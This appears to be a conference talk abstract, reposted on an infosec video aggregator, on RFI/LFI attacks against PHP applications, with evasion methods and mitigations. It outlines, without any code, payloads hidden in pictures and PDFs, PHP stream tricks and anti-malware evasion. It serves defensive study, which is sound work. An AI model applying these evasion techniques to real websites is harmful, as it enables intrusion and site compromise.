Surprisingly, however, RFI/ LFI are still considered the underdogs of vulnerabilities. Attractive RFI/ LFI attack targets are commonly PHP applications With more than 77% of today's websites running PHP, RFI should be on every security practitioner's radar.but isn't. Some notorious RFI/ LFI examples include: Anonymous using RFI bots to attack their targets and Timthumb- a WordPress add-on vulnerable to LFI which paved the way to 1.2 million infected websites.

It's time to seriously examine RFI/ LFI attacks. In this talk we quantify the prevalence of this attack based on our findings of this attack in the wild. We present proof of concepts which demonstrate how these attacks evade detection. We will also present new approaches in defeating this type of attack. In particular, we:

Introduce the RFI\LFI concepts and evaluate its potential effectiveness in the wildDemonstrate RFI attacks . starting with the basics and moving to recently witnessed advanced schemes which exploit PHP streams.Present a proof of concept of how to hide an LFI attack within benign-looking documents such as pictures and pdf documentsReveal a new RFI/LFI attack vector which evades anti-malware by splitting the attack vector across different picture textual fields.Provide mitigation steps to defeat against RFI/ LFI attacks, including a novel approach which uses shell hosting feed.

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.